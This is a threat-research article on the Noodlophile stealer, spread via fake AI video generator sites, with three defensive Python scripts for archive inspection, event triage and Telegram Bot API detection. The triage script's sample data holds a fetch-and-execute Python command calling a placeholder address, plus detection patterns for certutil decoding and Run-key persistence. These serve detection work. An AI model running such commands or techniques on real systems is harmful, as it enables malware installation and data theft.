Introduction
Cybercriminals are increasingly exploiting the surge of interest in artificial intelligence (AI) to deliver malware. A recent example is Noodlophile, an information stealer distributed through fake AI-powered video generation tools that infiltrates Windows systems and steals sensitive data.
The Deceptive Lure: Fake AI Video Generators
Attackers have created fraudulent websites with enticing names like "Dream Machine" and promoted them through high-visibility Facebook ads. The sites claim to offer advanced AI-driven video creation services, attracting users eager to leverage AI for content generation. Visitors are prompted to upload media files and told to expect an AI-generated video in return. Instead, they receive a ZIP archive containing a malicious executable disguised as a video file, such as INLINECODE0. The naming relies on Windows' default "Hide extensions for known file types" setting: with the final .exe hidden, the file appears to be a harmless media clip. (bleepingcomputer.com)
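As an added example (not code from the reports cited on this page), the following Python script opens a downloaded archive without extracting it and flags members that use the tricks described above: a media extension followed by a padded executable extension, and content whose magic bytes (a PE "MZ" header, or a RAR signature under a .pdf name) contradict the extension. The member names, extension lists and archive contents are constructed for the example.

```python
import io
import re
import zipfile

# Assumed extension lists for this example; they are not indicators from the reports.
MEDIA_EXTS = {"mp4", "avi", "mov", "mkv", "mp3", "wav", "jpg", "png"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "ps1"}

# Matches "<name>.mp4 .exe": a media extension, optional padding, then an executable extension.
DOUBLE_EXT = re.compile(
    r"\.(" + "|".join(sorted(MEDIA_EXTS)) + r")\s*\.(" + "|".join(sorted(EXEC_EXTS)) + r")$",
    re.IGNORECASE,
)

# File-format magic bytes and the extensions that legitimately carry them.
MAGIC = [
    (b"MZ", "pe", EXEC_EXTS),
    (b"Rar!\x1a\x07", "rar", {"rar"}),
]


def inspect_member(name: str, head: bytes) -> list:
    """Return tags explaining why one archive member looks like a disguised payload."""
    reasons = []
    base = name.rsplit("/", 1)[-1]
    if "." in base:
        stem, ext = base.rsplit(".", 1)
    else:
        stem, ext = base, ""
    ext = ext.lower()
    if DOUBLE_EXT.search(base):
        reasons.append("double-extension")
    # Spaces before the real extension push ".exe" out of view in a narrow
    # Explorer name column even when extensions are shown.
    if stem != stem.rstrip():
        reasons.append("whitespace-padding")
    for magic, kind, allowed in MAGIC:
        if head.startswith(magic) and ext not in allowed:
            reasons.append(f"magic-mismatch:{kind}")
    return reasons


def inspect_zip(data: bytes) -> dict:
    """Map each suspicious member name to its reasons, reading only the first bytes of each member."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)
            reasons = inspect_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive() -> bytes:
    """Constructed lure archive: one disguised PE, one RAR posing as a PDF, one real-looking clip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Dream Machine Output.mp4 .exe", b"MZ" + b"\x00" * 62)
        zf.writestr("Document.pdf", b"Rar!\x1a\x07\x01\x00" + b"\x00" * 56)
        zf.writestr("clip.mp4", b"\x00\x00\x00\x18ftypmp42" + b"\x00" * 52)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in inspect_zip(build_sample_archive()).items():
        print(f"{member!r}: {', '.join(reasons)}")
```

Run it against any archive a user downloaded before they open it; the checks read only the first eight bytes of each member, so a password-protected inner archive that is itself stored unencrypted in the ZIP is still identified by its signature.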
Multi-Stage Infection Chain
Executing the disguised file initiates a complex infection process:
- Execution of Repurposed Software: The executable is a 32-bit C++ application, signed with a certificate created via Winauth, and is actually a repurposed version of CapCut, a legitimate video editing tool (version 445.0). This repurposing helps it evade initial suspicion and some security solutions. (morphisec.com)
- Deployment of Malicious Components: The application launches a series of executables, including a batch script (INLINECODE1), which uses INLINECODE2 to decode and extract a base64-encoded, password-protected RAR archive disguised as a PDF document. (morphisec.com)
- Establishing Persistence: The script adds a new registry key to ensure the malware runs upon system startup. (morphisec.com)
- Payload Execution: The script executes INLINECODE3, which runs an obfuscated Python script (INLINECODE4) fetched from a hardcoded remote server address, eventually executing the Noodlophile Stealer in memory. (morphisec.com)
The injection technique depends on which security software is present. If Avast antivirus is detected, the loader uses process hollowing to run the payload inside INLINECODE5, a legitimate Windows binary; otherwise it uses shellcode injection to execute the stealer in memory, keeping it off disk and reducing the chance of detection. (morphisec.com)
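The following Python triage rules, added here as an example rather than taken from the vendor analyses, turn the chain above into checks over process and registry events in a Sysmon-like shape: certutil invoked with -decode, an autostart (Run) value that launches a script interpreter or points into a Temp directory, and a Python interpreter running out of Temp or handed a URL. The events, paths, value names and the 203.0.113.10 address are constructed for the example; the registry key name is the standard per-user Run key, which the reports do not confirm as the one used.

```python
import re

# Heuristics derived from the chain described above: certutil decoding a base64 blob,
# a Run-key entry for persistence, and a Python loader that pulls code from a remote
# host. They are generic rules written for this example, not vendor signatures.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
INTERPRETER = re.compile(r"\\(python|pythonw|wscript|cscript|mshta|powershell|cmd)\.exe\b", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: list) -> list:
    """Return (event index, tag) pairs for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            name = image_name(ev["image"])
            cmd = ev["cmdline"]
            # certutil is a signed Microsoft binary; "-decode" turns base64 text back into a file.
            if name == "certutil.exe" and re.search(r"-decode\b", cmd, re.IGNORECASE):
                hits.append((i, "certutil-decode"))
            # A Python interpreter running out of Temp, or handed a URL, is the loader stage.
            if name.startswith("python") and (TEMP_DIR.search(ev["image"]) or URL.search(cmd)):
                hits.append((i, "python-remote-exec"))
        elif ev["type"] == "registry" and RUN_KEY.search(ev["key"]):
            # Autostart entries that launch a script interpreter or point into Temp
            # are far more suspicious than signed applications installed under AppData.
            if INTERPRETER.search(ev["data"]) or TEMP_DIR.search(ev["data"]):
                hits.append((i, "run-key-persistence"))
    return hits


# Constructed events; the remote address is from the 203.0.113.0/24 documentation range.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil -decode "C:\Users\victim\AppData\Local\Temp\Document.pdf" out.rar',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "Updater",
     "data": r'"C:\Users\victim\AppData\Local\Temp\python.exe" "C:\Users\victim\AppData\Local\Temp\loader.py"'},
    {"type": "process", "image": r"C:\Users\victim\AppData\Local\Temp\python.exe",
     "cmdline": 'python.exe -c "import urllib.request as u;exec(u.urlopen(\'http://203.0.113.10/s\').read())"',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "OneDrive",
     "data": r'"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for idx, tag in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {tag}")
```

The last sample event is a legitimate OneDrive autostart living under AppData; keying the persistence rule on interpreters and Temp paths rather than on "anything under AppData" keeps it out of the results while still catching a Python loader dropped into Temp.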
Noodlophile Stealer: A New Threat
Noodlophile is a previously undocumented information stealer that targets data stored in web browsers, including account credentials, session cookies, tokens, and cryptocurrency wallet files. It exfiltrates the stolen data through a Telegram bot that doubles as a covert command and control (C2) channel, giving attackers real-time access to the compromised information. In some instances, Noodlophile is bundled with XWorm, a remote access trojan, which gives attackers remote control of the host beyond passive data theft. (bleepingcomputer.com)
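As an added example, not part of the reporting above, the Python script below picks Telegram Bot API traffic out of proxy records. The Bot API is reached at api.telegram.org under a path of the form /bot<id>:<secret>/<method>, and it is used by bots rather than by the regular messaging clients, so a workstation calling it is running a bot. The log lines, client addresses and the bot token are constructed for the example, and the record layout (timestamp, client, verb, host, path, status, bytes sent) is an assumption about the proxy format.

```python
import re
from collections import defaultdict
from typing import Optional

# Telegram Bot API requests look like https://api.telegram.org/bot<id>:<secret>/<method>.
BOT_PATH = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")
# Methods that push content to the bot's chat, i.e. the exfiltration direction.
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio", "sendMessage"}


def parse_line(line: str) -> Optional[dict]:
    """Parse one constructed proxy record: ts client verb host path status bytes_out."""
    parts = line.split()
    if len(parts) != 7:
        return None
    ts, client, verb, host, path, status, sent = parts
    try:
        sent_bytes = int(sent)
    except ValueError:
        return None
    return {"ts": ts, "client": client, "verb": verb, "host": host.lower(),
            "path": path, "status": status, "bytes": sent_bytes}


def detect_bot_api(lines: list) -> dict:
    """Group Telegram Bot API traffic by (client, bot id); bot id is "?" when only the host is visible."""
    hits = defaultdict(lambda: {"methods": [], "bytes": 0, "token": None, "upload": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["host"] != "api.telegram.org":
            continue
        m = BOT_PATH.match(rec["path"])
        if m:
            bot_id, secret, method = m.groups()
            entry = hits[(rec["client"], bot_id)]
            entry["methods"].append(method)
            # Keep only a prefix of the secret: enough to correlate across hosts, not enough to reuse.
            entry["token"] = f"{bot_id}:{secret[:4]}..."
            entry["upload"] = entry["upload"] or method in UPLOAD_METHODS
        else:
            # No TLS inspection: the path is not visible, only the SNI host.
            entry = hits[(rec["client"], "?")]
        entry["bytes"] += rec["bytes"]
    return dict(hits)


# Constructed proxy records; addresses, token and sizes are invented for the example.
SAMPLE_LOG = [
    "2025-05-12T10:01:22Z 10.0.0.5 POST api.telegram.org /bot123456789:AAFconstructedSecret/sendDocument 200 48213",
    "2025-05-12T10:01:25Z 10.0.0.5 POST api.telegram.org /bot123456789:AAFconstructedSecret/sendMessage 200 512",
    "2025-05-12T10:02:00Z 10.0.0.7 GET web.telegram.org /k/ 200 1200",
    "2025-05-12T10:03:10Z 10.0.0.9 GET example.com /index.html 200 3000",
    "2025-05-12T10:05:00Z 10.0.0.11 CONNECT api.telegram.org - 200 9000",
    "malformed line",
]

if __name__ == "__main__":
    for (client, bot_id), info in detect_bot_api(SAMPLE_LOG).items():
        print(client, bot_id, info)
```

Where the proxy does not inspect TLS, only the SNI host is visible, so the script still records contact with api.telegram.org under a "?" bot id; a workstation with no business reason to run a bot should alert on that alone, and the byte count sent gives a first estimate of how much was taken.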
Implications and Impact
The Noodlophile campaign underscores a significant evolution in cyber threats, where attackers exploit the public's trust in emerging AI technologies. By leveraging the allure of AI-powered tools, they effectively deceive users into compromising their systems. The use of legitimate software components and advanced obfuscation techniques makes detection and mitigation challenging. The potential for widespread data theft, including sensitive personal and financial information, poses substantial risks to individuals and organizations alike.
Technical Details
- Malware Delivery: The initial payload is delivered through a ZIP archive containing a deceptively named executable.
- Execution Mechanism: The executable is a repurposed version of CapCut, signed with a fraudulent certificate, which initiates the infection chain.
- Persistence: The malware establishes persistence by adding a registry key, ensuring it runs upon system startup.
- Data Exfiltration: Stolen data is exfiltrated via a Telegram bot, providing attackers with real-time access.
- Additional Payloads: In some cases, the malware deploys XWorm, a remote access trojan, for enhanced control over the infected system.
Conclusion
The Noodlophile malware campaign highlights the growing sophistication of cyber threats that exploit the popularity of AI technologies. Users must exercise caution when engaging with online AI tools, especially those promoted through social media ads. Implementing robust cybersecurity practices, such as verifying the authenticity of software sources, maintaining updated security software, and being vigilant about file extensions and downloads, is crucial in mitigating such threats.